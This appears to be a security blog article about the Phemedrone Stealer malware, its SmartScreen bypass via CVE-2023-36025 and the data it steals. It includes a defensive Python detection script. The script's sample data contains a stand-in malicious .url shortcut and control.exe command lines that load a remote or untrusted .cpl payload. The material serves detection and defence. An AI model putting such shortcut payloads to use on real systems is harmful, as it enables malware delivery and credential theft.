Phemedrone Stealer Malware evades Microsoft Windows Defender SmartScreen.

Cybersecurity researchers have discovered a new Windows malware, named Phemedrone Stealer, that is being actively used in the wild. The malware, which is said to target users' browsers and information stored in crypto wallets and messaging apps such as Discord, Steam, and Telegram, is sophisticated enough to steal sensitive information such as hardware and location details, operating system details, and screen captures of the infected device.

Phemedrone Stealer is open source, written in the C# programming language, and communicates with the attacker's C2 server in order to exfiltrate the stolen information. More notably, the malware exploits CVE-2023-36025, a vulnerability that lets it bypass Microsoft Windows Defender SmartScreen because of missing security checks and warning prompts for internet shortcut (.url) files.

[Image: Phemedrone malware stealer evades Microsoft Defender. Image source: Fixitgearware]

Phemedrone malware infestation: 

According to researchers at Trend Micro, the Phemedrone malware is delivered as a series of internet shortcut files hosted on file-sharing services such as FileTransfer.io and messaging apps such as Discord. To obfuscate the delivery, the threat actor is said to host them behind shortened URLs, tricking an unsuspecting user into opening the link, which then exploits CVE-2023-36025.

Upon execution, a reverse shell is established (the victim device connects back to the attacker's C2 server), and a *.cpl file, which is a Windows Control Panel item, is downloaded. In order to evade detection by Microsoft Defender, the threat actor crafted the Windows shortcut (.url) file so that SmartScreen does not flag the malicious *.cpl payload (a file containing the malicious code).

For the execution technique, the threat actor leveraged MITRE ATT&CK T1218.002 (Control Panel), abusing the Windows Control Panel binary (control.exe) to run the malicious *.cpl file.
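The delivery chain above (a .url shortcut leading to a .cpl that control.exe then loads) gives defenders two cheap hunting points. The following Python script is an added example written for this article; it is not code from Trend Micro, Fixitgearware or the malware's authors. It applies two heuristics to constructed sample data: a .url file whose target is a .cpl or a remote file path, and a process-creation event where control.exe or rundll32.exe loads a .cpl from outside the Windows system directories. The JSON event format, field names (ts, image, cmdline) and the sample values are assumptions made for the example and should be mapped onto whatever your EDR or Sysmon pipeline actually emits.

```python
"""Hunting heuristics for the Phemedrone delivery chain (example code, not the
project's own): a .url internet shortcut pointing at a .cpl, followed by
control.exe loading that .cpl (MITRE ATT&CK T1218.002)."""
import json
import re
from typing import Optional
from urllib.parse import urlparse

# Directories from which a legitimate Control Panel item normally loads.
TRUSTED_CPL_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")

# A quoted or unquoted token ending in .cpl inside a command line.
CPL_RE = re.compile(r'(?:"([^"]+\.cpl)"|(\S+\.cpl))', re.IGNORECASE)


def url_shortcut_target(text: str) -> Optional[str]:
    """Return the URL= value of a .url file body (INI-style), or None."""
    for line in text.splitlines():
        key, sep, value = line.partition("=")
        if sep and key.strip().lower() == "url":
            return value.strip()
    return None


def is_suspicious_url_shortcut(text: str) -> bool:
    """Heuristic: a shortcut whose target is a .cpl, or a file:/UNC path on a
    remote host, is not something a normal web shortcut does."""
    target = url_shortcut_target(text)
    if target is None:
        return False
    parsed = urlparse(target)
    if target.lower().endswith(".cpl") or (parsed.path or "").lower().endswith(".cpl"):
        return True
    # file://host/share/... means the shortcut loads a file from a remote host
    if parsed.scheme == "file" and parsed.netloc:
        return True
    return target.startswith("\\\\")  # raw UNC path


def flag_cpl_events(log_lines):
    """Scan JSON process-creation events and return those where control.exe or
    rundll32.exe loads a .cpl from outside the trusted Windows directories."""
    hits = []
    for raw in log_lines:
        ev = json.loads(raw)
        image = ev.get("image", "").rsplit("\\", 1)[-1].lower()
        if image not in ("control.exe", "rundll32.exe"):
            continue
        m = CPL_RE.search(ev.get("cmdline", ""))
        if not m:
            continue
        cpl = (m.group(1) or m.group(2)).lower()
        if not cpl.startswith(TRUSTED_CPL_DIRS):
            hits.append({"ts": ev.get("ts"), "cpl": cpl, "reason": "untrusted .cpl path"})
    return hits


# Constructed sample inputs (not real indicators). 203.0.113.0/24 is a
# documentation range; the shortcut body mimics a .url pointing at a remote .cpl.
SAMPLE_URL_FILE = "[InternetShortcut]\r\nURL=file://203.0.113.5@80/dav/update.cpl\r\n"
SAMPLE_EVENTS = [
    json.dumps({"ts": "2024-01-15T10:02:11Z", "image": r"C:\Windows\System32\control.exe",
                "cmdline": r"control.exe C:\Windows\System32\timedate.cpl"}),   # benign
    json.dumps({"ts": "2024-01-15T10:04:37Z", "image": r"C:\Windows\System32\control.exe",
                "cmdline": r"control.exe \\203.0.113.5@80\dav\update.cpl"}),      # remote .cpl
    json.dumps({"ts": "2024-01-15T10:05:02Z", "image": r"C:\Windows\System32\rundll32.exe",
                "cmdline": r'rundll32.exe shell32.dll,Control_RunDLL "C:\Users\bob\AppData\Local\Temp\x.cpl"'}),
]

if __name__ == "__main__":
    print("suspicious .url:", is_suspicious_url_shortcut(SAMPLE_URL_FILE))
    for hit in flag_cpl_events(SAMPLE_EVENTS):
        print("ALERT", hit)
```

The .url check is useful at the mail gateway or on a download directory; the process-event check is the one to turn into a SIEM rule, since a .cpl loaded from a temp folder, a user profile or a remote share has almost no legitimate business use.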

Phemedrone malware capabilities:

The Phemedrone Stealer malware allows threat actors to circumvent Microsoft Windows Defender SmartScreen. After a successful bypass, the malware sets out to steal sensitive information such as passwords, authentication cookies, and other data stored in the browsers on the infected user's device.

Although a patch was first released in November 2023 (last year), threat actors are said to still be exploiting devices that are yet to be patched and remain vulnerable to infection and exploitation by the malware.

Notable targeted applications:

In the course of the research, Phemedrone malware was found to target multiple applications and exfiltrate sensitive information. Further findings by Trend Micro indicate that the following applications were targeted, with the respective information stolen by the threat actor:

  • Chromium-based browsers: Browsers such as Chromium were targeted by this malware, and data from password manager and authenticator extensions such as LastPass, KeePass, NordPass, Google Authenticator, Duo Mobile, and Microsoft Authenticator was exfiltrated.
  • Crypto wallets: Phemedrone was discovered to target crypto wallets such as Armory, Atomic, Bytecoin, Coinomi, etc.
  • Discord: Authentication tokens for the infected user's Discord app are stolen, granting unauthorized access to the victim's account.
  • FileZilla: The malware is also able to intercept an established connection of the FTP application FileZilla, harvesting sensitive credentials such as username, password, and IP address.
  • System information: Phemedrone is capable of stealing sensitive information such as geolocation, hardware specifications, OS info and version, and capturing screenshots of the victim's device.
  • Steam Gaming: The gaming platform Steam was not left out, as it was found to be targeted by the malware, enabling hackers to gain unauthorized access to files belonging to the gaming platform.

Conclusion:

Although a patch is available, threat actors are said to be finding new ways to exploit CVE-2023-36025 and thereby evade Windows Defender SmartScreen protection. This is made possible because large organizations are yet to patch their vulnerable devices. Organizations are therefore advised to patch their devices as soon as possible.

It should also be noted that a proof-of-concept (PoC) exploit for CVE-2023-36025 has been discovered in the wild, and more threat actors will find ways to leverage the Phemedrone malware in targeting high-profile organizations or individuals whose devices remain unpatched.

At Fixitgearware Security we are security conscious, and we advise our readers and the public to be as well. Organizations are also advised to apply the necessary patches as provided by Microsoft. For more information and findings about this malware, head over to Trend Micro.

Remember to always stay safe, and be vigilant 🛡️!